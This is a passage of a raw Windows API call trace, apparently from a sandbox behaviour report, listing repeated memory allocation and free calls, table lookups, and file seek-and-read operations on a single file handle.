0x5d1edb0 [0251.811] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433fb0 [0251.811] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eba0 [0251.811] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e30 [0251.811] LocalFree (hMem=0x43df6a0) returned 0x0 [0251.811] LocalFree (hMem=0xd1948e0) returned 0x0 [0251.811] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d39310 [0251.811] LocalFree (hMem=0xd1941a0) returned 0x0 [0251.811] LocalFree (hMem=0x5d1efc0) returned 0x0 [0251.811] LocalFree (hMem=0x4433f80) returned 0x0 [0251.811] LocalFree (hMem=0x4433fb0) returned 0x0 [0251.811] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd194500 [0251.811] LocalFree (hMem=0x5d1f1a0) returned 0x0 [0251.811] LocalFree (hMem=0x5d1ed20) returned 0x0 [0251.811] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.811] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.811] LocalFree (hMem=0x4433e30) returned 0x0 [0251.811] LocalFree (hMem=0x5d1eba0) returned 0x0 [0251.811] LocalFree (hMem=0xd1cf940) returned 0x0 [0251.811] LocalFree (hMem=0x5d1f500) returned 0x0 [0251.811] LocalFree (hMem=0xd194500) returned 0x0 [0251.811] LocalFree (hMem=0x5d39310) returned 0x0 [0251.811] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84648 [0251.811] LocalAlloc (uFlags=0x40, uBytes=0x80) returned 0x43df6a0 [0251.811] SetFilePointer (in: hFile=0xb48, lDistanceToMove=23232, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x5ac0 [0251.812] ReadFile (in: hFile=0xb48, lpBuffer=0x43df6a0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0x43df6a0*, lpNumberOfBytesRead=0x235e4c8*=0x80, lpOverlapped=0x0) returned 1 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194300 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1edb0 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0xc0) returned 0xd214660 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eba0 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd194540 [0251.812] LocalFree (hMem=0xd194540) returned 0x0 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0xd194360 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f260 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e90 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee40 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f00 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f170 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ed0 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f440 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x1f) returned 0x5d1ee70 [0251.812] LocalFree (hMem=0x5d1ee70) returned 0x0 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f0e0 [0251.812] LocalFree (hMem=0x43df6a0) returned 0x0 [0251.812] LocalFree (hMem=0xd194300) returned 0x0 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d39b10 [0251.812] LocalFree (hMem=0xd194360) returned 0x0 [0251.812] LocalFree (hMem=0x4433e90) returned 0x0 [0251.812] LocalFree (hMem=0x4433f00) returned 0x0 [0251.812] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd194740 [0251.813] LocalFree (hMem=0x5d1f0e0) returned 0x0 [0251.813] LocalFree (hMem=0x5d1eba0) returned 0x0 [0251.813] LocalFree (hMem=0x5d1f260) returned 0x0 [0251.813] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.813] LocalFree (hMem=0x4433ed0) returned 0x0 [0251.813] LocalFree (hMem=0x5d1f170) returned 0x0 [0251.813] LocalFree (hMem=0x5d1f440) returned 0x0 [0251.813] LocalFree (hMem=0xd214660) returned 0x0 [0251.813] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.813] bsearch (_Key=0x235e4c8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84b70 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x34e) returned 0xd1b50c0 [0251.813] SetFilePointer (in: hFile=0xb48, lDistanceToMove=59968, lpDistanceToMoveHigh=0x235e488*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e488*=0) returned 0xea40 [0251.813] ReadFile (in: hFile=0xb48, lpBuffer=0xd1b50c0, nNumberOfBytesToRead=0x34e, lpNumberOfBytesRead=0x235e498, lpOverlapped=0x0 | out: lpBuffer=0xd1b50c0*, lpNumberOfBytesRead=0x235e498*=0x34e, lpOverlapped=0x0) returned 1 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194400 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1e990 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0xd1d93d0 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1e9c0 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x35) returned 0x5d1be20 [0251.813] LocalFree (hMem=0x5d1be20) returned 0x0 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x36) returned 0x5d1c6a0 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ec90 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x35) returned 0x5d1bfa0 [0251.813] LocalFree (hMem=0x5d1bfa0) returned 0x0 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x36) returned 0x5d1ba20 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eed0 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434080 [0251.813] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f4a0 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e30 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f080 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194520 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f0e0 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1948c0 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f3b0 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd1946c0 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f230 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434110 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ef60 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e40 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1efc0 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x24d) returned 0xd185520 [0251.814] LocalFree (hMem=0xd1b50c0) returned 0x0 [0251.814] LocalFree (hMem=0xd194400) returned 0x0 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d3a210 [0251.814] LocalFree (hMem=0x5d1c6a0) returned 0x0 [0251.814] LocalFree (hMem=0x5d1ba20) returned 0x0 [0251.814] LocalFree (hMem=0x4434080) returned 0x0 [0251.814] LocalFree (hMem=0x4433e30) returned 0x0 [0251.814] LocalFree (hMem=0xd194520) returned 0x0 [0251.814] LocalFree (hMem=0xd1948c0) returned 0x0 [0251.814] LocalFree (hMem=0xd1946c0) returned 0x0 [0251.814] LocalFree (hMem=0x4434110) returned 0x0 [0251.814] LocalFree (hMem=0x4433e40) returned 0x0 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x48) returned 0xd1bde80 [0251.814] LocalAlloc (uFlags=0x40, uBytes=0x24d) returned 0xd184ba0 [0251.814] LocalFree (hMem=0x5d1e9c0) returned 0x0 [0251.814] LocalFree (hMem=0x5d1ec90) returned 0x0 [0251.815] LocalFree (hMem=0x5d1eed0) returned 0x0 [0251.815] LocalFree (hMem=0x5d1f4a0) returned 0x0 [0251.815] LocalFree (hMem=0x5d1f080) returned 0x0 [0251.815] LocalFree (hMem=0x5d1f0e0) returned 0x0 [0251.815] LocalFree (hMem=0x5d1f3b0) returned 0x0 [0251.815] LocalFree (hMem=0x5d1f230) returned 0x0 [0251.815] LocalFree (hMem=0x5d1ef60) returned 0x0 [0251.815] LocalFree (hMem=0xd185520) returned 0x0 [0251.815] LocalFree (hMem=0x5d1efc0) returned 0x0 [0251.815] LocalFree (hMem=0xd1d93d0) returned 0x0 [0251.815] LocalFree (hMem=0x5d1e990) returned 0x0 [0251.815] LocalFree (hMem=0xd1bde80) returned 0x0 [0251.815] LocalFree (hMem=0x5d3a210) returned 0x0 [0251.815] bsearch (_Key=0x235e4c8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84b98 [0251.815] LocalAlloc (uFlags=0x40, uBytes=0x2d4) returned 0x43700d0 [0251.815] SetFilePointer (in: hFile=0xb48, lDistanceToMove=71232, lpDistanceToMoveHigh=0x235e488*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e488*=0) returned 0x11640 [0251.815] ReadFile (in: hFile=0xb48, lpBuffer=0x43700d0, nNumberOfBytesToRead=0x2d4, lpNumberOfBytesRead=0x235e498, lpOverlapped=0x0 | out: lpBuffer=0x43700d0*, lpNumberOfBytesRead=0x235e498*=0x2d4, lpOverlapped=0x0) returned 1 [0251.815] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd1942c0 [0251.815] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1f260 [0251.815] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0xd1d7ed0 [0251.815] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f500 [0251.815] LocalAlloc (uFlags=0x40, uBytes=0x4b) returned 0x44324b0 [0251.815] LocalFree (hMem=0x44324b0) returned 0x0 [0251.815] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44324b0 [0251.815] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ef60 [0251.815] LocalAlloc (uFlags=0x40, uBytes=0x4b) returned 0x44325d0 [0251.816] LocalFree (hMem=0x44325d0) returned 0x0 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4432750 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb10 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ff0 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee70 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433d90 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ecc0 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194520 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f170 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194180 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd1941a0 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eba0 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f30 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f350 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434070 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f320 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0x1a7) returned 0xd18cb30 [0251.816] LocalFree (hMem=0x43700d0) returned 0x0 [0251.816] LocalFree (hMem=0xd1942c0) returned 0x0 [0251.816] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d37810 [0251.816] LocalFree (hMem=0x44324b0) returned 0x0 [0251.816] LocalFree (hMem=0x4432750) returned 0x0 [0251.816] LocalFree (hMem=0x4433ff0) returned 0x0 [0251.816] LocalFree (hMem=0x4433d90) returned 0x0 [0251.816] LocalFree (hMem=0xd194520) returned 0x0 [0251.816] LocalFree (hMem=0xd194180) returned 0x0 [0251.816] LocalFree (hMem=0xd1941a0) returned 0x0 [0251.817] LocalFree (hMem=0x4433f30) returned 0x0 [0251.817] LocalFree (hMem=0x4434070) returned 0x0 [0251.817] LocalAlloc (uFlags=0x40, uBytes=0x48) returned 0xd1bde80 [0251.817] LocalAlloc (uFlags=0x40, uBytes=0x1a7) returned 0xd18d040 [0251.817] LocalFree (hMem=0x5d1f500) returned 0x0 [0251.817] LocalFree (hMem=0x5d1ef60) returned 0x0 [0251.817] LocalFree (hMem=0x5d1eb10) returned 0x0 [0251.817] LocalFree (hMem=0x5d1ee70) returned 0x0 [0251.817] LocalFree (hMem=0x5d1ecc0) returned 0x0 [0251.817] LocalFree (hMem=0x5d1f170) returned 0x0 [0251.817] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.817] LocalFree (hMem=0x5d1eba0) returned 0x0 [0251.817] LocalFree (hMem=0x5d1f350) returned 0x0 [0251.817] LocalFree (hMem=0xd18cb30) returned 0x0 [0251.817] LocalFree (hMem=0x5d1f320) returned 0x0 [0251.817] LocalFree (hMem=0xd1d7ed0) returned 0x0 [0251.817] LocalFree (hMem=0x5d1f260) returned 0x0 [0251.817] LocalFree (hMem=0xd1bde80) returned 0x0 [0251.817] LocalFree (hMem=0x5d37810) returned 0x0 [0251.817] bsearch (_Key=0x235e4c8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84bc0 [0251.817] LocalAlloc (uFlags=0x40, uBytes=0x386) returned 0xd18b660 [0251.817] SetFilePointer (in: hFile=0xb48, lDistanceToMove=72000, lpDistanceToMoveHigh=0x235e488*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e488*=0) returned 0x11940 [0251.817] ReadFile (in: hFile=0xb48, lpBuffer=0xd18b660, nNumberOfBytesToRead=0x386, lpNumberOfBytesRead=0x235e498, lpOverlapped=0x0 | out: lpBuffer=0xd18b660*, lpNumberOfBytesRead=0x235e498*=0x386, lpOverlapped=0x0) returned 1 [0251.817] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd1942c0 [0251.817] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1f320 [0251.817] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0xd1d9130 [0251.817] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ec90 [0251.817] LocalAlloc (uFlags=0x40, uBytes=0x37) returned 0x5d1c420 [0251.818] LocalFree (hMem=0x5d1c420) returned 0x0 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x38) returned 0x5d1bfa0 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee40 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x37) returned 0x5d1c0a0 [0251.818] LocalFree (hMem=0x5d1c0a0) returned 0x0 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x38) returned 0x5d1c0a0 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f2c0 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e30 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb10 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e40 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee70 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194360 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eba0 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1946c0 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f440 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd194300 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f1a0 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434080 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ecc0 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e60 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f290 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0x280) returned 0xd1a2490 [0251.818] LocalFree (hMem=0xd18b660) returned 0x0 [0251.818] LocalFree (hMem=0xd1942c0) returned 0x0 [0251.818] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d37210 [0251.819] LocalFree (hMem=0x5d1bfa0) returned 0x0 [0251.819] LocalFree (hMem=0x5d1c0a0) returned 0x0 [0251.819] LocalFree (hMem=0x4433e30) returned 0x0 [0251.819] LocalFree (hMem=0x4433e40) returned 0x0 [0251.819] LocalFree (hMem=0xd194360) returned 0x0 [0251.819] LocalFree (hMem=0xd1946c0) returned 0x0 [0251.819] LocalFree (hMem=0xd194300) returned 0x0 [0251.819] LocalFree (hMem=0x4434080) returned 0x0 [0251.819] LocalFree (hMem=0x4433e60) returned 0x0 [0251.819] LocalFree (hMem=0xd1a2490) returned 0x0 [0251.819] LocalFree (hMem=0x5d1ec90) returned 0x0 [0251.819] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.819] LocalFree (hMem=0x5d1f2c0) returned 0x0 [0251.819] LocalFree (hMem=0x5d1eb10) returned 0x0 [0251.819] LocalFree (hMem=0x5d1ee70) returned 0x0 [0251.819] LocalFree (hMem=0x5d1eba0) returned 0x0 [0251.819] LocalFree (hMem=0x5d1f440) returned 0x0 [0251.819] LocalFree (hMem=0x5d1f1a0) returned 0x0 [0251.819] LocalFree (hMem=0x5d1ecc0) returned 0x0 [0251.819] LocalFree (hMem=0x5d1f290) returned 0x0 [0251.819] LocalFree (hMem=0xd1d9130) returned 0x0 [0251.819] LocalFree (hMem=0x5d1f320) returned 0x0 [0251.819] LocalFree (hMem=0x5d37210) returned 0x0 [0251.819] LocalFree (hMem=0xd194740) returned 0x0 [0251.819] LocalFree (hMem=0x5d39b10) returned 0x0 [0251.819] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84670 [0251.819] LocalAlloc (uFlags=0x40, uBytes=0x78) returned 0xd209b30 [0251.819] SetFilePointer (in: hFile=0xb48, lDistanceToMove=26432, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x6740 [0251.819] ReadFile (in: hFile=0xb48, lpBuffer=0xd209b30, nNumberOfBytesToRead=0x78, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0xd209b30*, lpNumberOfBytesRead=0x235e4c8*=0x78, lpOverlapped=0x0) returned 1 [0251.819] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194260 [0251.819] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1efc0 [0251.819] LocalAlloc (uFlags=0x40, uBytes=0xc0) returned 0xd214f50 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee40 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd1946e0 [0251.820] LocalFree (hMem=0xd1946e0) returned 0x0 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0xd1944a0 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee70 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434080 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb10 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e70 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eea0 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434010 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eff0 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xd194620 [0251.820] LocalFree (hMem=0xd194620) returned 0x0 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194500 [0251.820] LocalFree (hMem=0xd209b30) returned 0x0 [0251.820] LocalFree (hMem=0xd194260) returned 0x0 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d37d10 [0251.820] LocalFree (hMem=0xd1944a0) returned 0x0 [0251.820] LocalFree (hMem=0x4434080) returned 0x0 [0251.820] LocalFree (hMem=0x4433e70) returned 0x0 [0251.820] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd194300 [0251.820] LocalFree (hMem=0xd194500) returned 0x0 [0251.820] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.820] LocalFree (hMem=0x5d1ee70) returned 0x0 [0251.820] LocalFree (hMem=0x5d1eb10) returned 0x0 [0251.820] LocalFree (hMem=0x4434010) returned 0x0 [0251.820] LocalFree (hMem=0x5d1eea0) returned 0x0 [0251.820] LocalFree (hMem=0x5d1eff0) returned 0x0 [0251.820] LocalFree (hMem=0xd214f50) returned 0x0 [0251.820] LocalFree (hMem=0x5d1efc0) returned 0x0 [0251.821] LocalFree (hMem=0xd194300) returned 0x0 [0251.821] LocalFree (hMem=0x5d37d10) returned 0x0 [0251.821] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84698 [0251.821] LocalAlloc (uFlags=0x40, uBytes=0x76) returned 0xd20ae30 [0251.821] SetFilePointer (in: hFile=0xb48, lDistanceToMove=30464, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x7700 [0251.821] ReadFile (in: hFile=0xb48, lpBuffer=0xd20ae30, nNumberOfBytesToRead=0x76, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0xd20ae30*, lpNumberOfBytesRead=0x235e4c8*=0x76, lpOverlapped=0x0) returned 1 [0251.821] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd1946c0 [0251.821] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1eb10 [0251.821] LocalAlloc (uFlags=0x40, uBytes=0xc0) returned 0xd2148d0 [0251.821] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.821] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0xd194500 [0251.822] LocalFree (hMem=0xd194500) returned 0x0 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd194740 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ec90 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433fc0 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f2f0 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f80 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee40 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e30 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee70 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xd194520 [0251.822] LocalFree (hMem=0xd194520) returned 0x0 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd1946e0 [0251.822] LocalFree (hMem=0xd20ae30) returned 0x0 [0251.822] LocalFree (hMem=0xd1946c0) returned 0x0 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d39e10 [0251.822] LocalFree (hMem=0xd194740) returned 0x0 [0251.822] LocalFree (hMem=0x4433fc0) returned 0x0 [0251.822] LocalFree (hMem=0x4433f80) returned 0x0 [0251.822] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd194420 [0251.822] LocalFree (hMem=0xd1946e0) returned 0x0 [0251.822] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.822] LocalFree (hMem=0x5d1ec90) returned 0x0 [0251.822] LocalFree (hMem=0x5d1f2f0) returned 0x0 [0251.822] LocalFree (hMem=0x4433e30) returned 0x0 [0251.822] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.822] LocalFree (hMem=0x5d1ee70) returned 0x0 [0251.822] LocalFree (hMem=0xd2148d0) returned 0x0 [0251.822] LocalFree (hMem=0x5d1eb10) returned 0x0 [0251.822] LocalFree (hMem=0xd194420) returned 0x0 [0251.822] LocalFree (hMem=0x5d39e10) returned 0x0 [0251.822] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d846c0 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x78) returned 0xd209b30 [0251.823] SetFilePointer (in: hFile=0xb48, lDistanceToMove=22592, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x5840 [0251.823] ReadFile (in: hFile=0xb48, lpBuffer=0xd209b30, nNumberOfBytesToRead=0x78, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0xd209b30*, lpNumberOfBytesRead=0x235e4c8*=0x78, lpOverlapped=0x0) returned 1 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194400 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1f3b0 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0xc0) returned 0xd215f90 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb10 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0xd194520 [0251.823] LocalFree (hMem=0xd194520) returned 0x0 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0xd1947e0 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ea0 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f0e0 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433db0 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f140 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e30 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee40 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x1d) returned 0x5d1ec90 [0251.823] LocalFree (hMem=0x5d1ec90) returned 0x0 [0251.823] LocalAlloc (uFlags=0x40, uBytes=0x1e) returned 0x5d1f230 [0251.823] LocalFree (hMem=0xd209b30) returned 0x0 [0251.823] LocalFree (hMem=0xd194400) returned 0x0 [0251.824] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d37810 [0251.824] LocalFree (hMem=0xd1947e0) returned 0x0 [0251.824] LocalFree (hMem=0x4433ea0) returned 0x0 [0251.824] LocalFree (hMem=0x4433db0) returned 0x0 [0251.824] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd194880 [0251.824] LocalFree (hMem=0x5d1f230) returned 0x0 [0251.824] LocalFree (hMem=0x5d1eb10) returned 0x0 [0251.824] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.824] LocalFree (hMem=0x5d1f0e0) returned 0x0 [0251.824] LocalFree (hMem=0x4433e30) returned 0x0 [0251.824] LocalFree (hMem=0x5d1f140) returned 0x0 [0251.824] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.824] LocalFree (hMem=0xd215f90) returned 0x0 [0251.824] LocalFree (hMem=0x5d1f3b0) returned 0x0 [0251.824] LocalFree (hMem=0xd194880) returned 0x0 [0251.824] LocalFree (hMem=0x5d37810) returned 0x0 [0251.824] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d846e8 [0251.824] LocalAlloc (uFlags=0x40, uBytes=0x6c) returned 0xd209b30 [0251.824] SetFilePointer (in: hFile=0xb48, lDistanceToMove=22912, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x5980 [0251.824] ReadFile (in: hFile=0xb48, lpBuffer=0xd209b30, nNumberOfBytesToRead=0x6c, 